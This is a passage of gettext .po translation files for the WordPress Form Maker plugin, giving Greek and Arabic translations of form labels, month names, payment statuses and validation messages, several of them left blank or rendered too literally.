msgstr "Αυτό δεν είναι μια έγκυρη διεύθυνση ηλεκτρονικού ταχυδρομείου."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Δεν μπορείτε να επιλέξετε πρώην ημερομηνίες. Επιλέξτε μια ημερομηνία, αρχής "
"γενομένης από την τρέχουσα."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "ο "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "τιμή πρέπει να είναι μεταξύ "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "ποσότητα "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Το σκορ σας θα πρέπει να είναι μικρότερη από "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Τίτλος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Πρώτο"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Τελευταία"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Μέσον"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Κώδικας περιοχής"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Αριθμός τηλεφώνου"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "δολάρια "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "cents "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "από "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "να"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "πηγαίνετε"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Επαναφορά v"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Επιλέξτε ένα πεδίο"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Επιλέξτε μια ημερομηνία"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-ar.po000060400000060103152434416630011600 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:49+0400\n"
"PO-Revision-Date: 2015-05-22 16:50+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: ar\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "عنوان الشارع"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "الشارع سطر العنوان 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "مدينة"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "الدولة / الإقليم / المنطقة"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "البريدي / الرمز البريدي"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "بلد"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "يناير"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "فبراير"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "مسيرة"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "أبريل"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "قد"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "يونيو"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "يوليو"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "أغسطس"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "سبتمبر"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "أكتوبر"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "نوفمبر"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "ديسمبر"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
#, fuzzy
msgid "Error, incorrect Security code."
msgstr "خطأ، غير صحيح رمز الحماية."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"والقائمة السوداء الملكية الفكرية الخاصة بك. يرجى الاتصال بمسؤول الموقع. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "ملف يتجاوز حجم المسموح به من"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "عذرا، لا يسمح لك لتحميل هذا النوع من الملفات."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "خطأ، لا يمكن أن يتم نقل ملف."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "هذا الحقل يتطلب٪ %s إدخال فريدة من نوعها، وقدم بالفعل هذه القيمة."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "خطأ، لم يتم إرسال البريد الإلكتروني."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "وقدم شيئا."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "وقدم النموذج الخاص بك بنجاح."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "خطأ، لم يتم إرسال البريد الإلكتروني."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "يتم التحقق بالفعل عنوان بريدك الإلكتروني."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "تم التحقق من بريدك الإلكتروني بنجاح."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "انتهت مهلة التحقق من بريدك الإلكتروني."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "رابط التحقق غير صالح."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "مطلوب الميدان."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "هذا ليس عنوان بريد إلكتروني صالح."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"لا يمكنك تحديد التواريخ السابقة. اختيار التاريخ بدءا من النظام الحالي."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "ال "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "يجب أن تكون القيمة بين "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "كمية "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "يجب أن تكون درجاتك أقل من "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "لقب"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "الأول"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "آخر"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "وسط"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "كود المنطقة"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "رقم الهاتف"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "دولار"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "سنتا "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "من "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "إلى"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

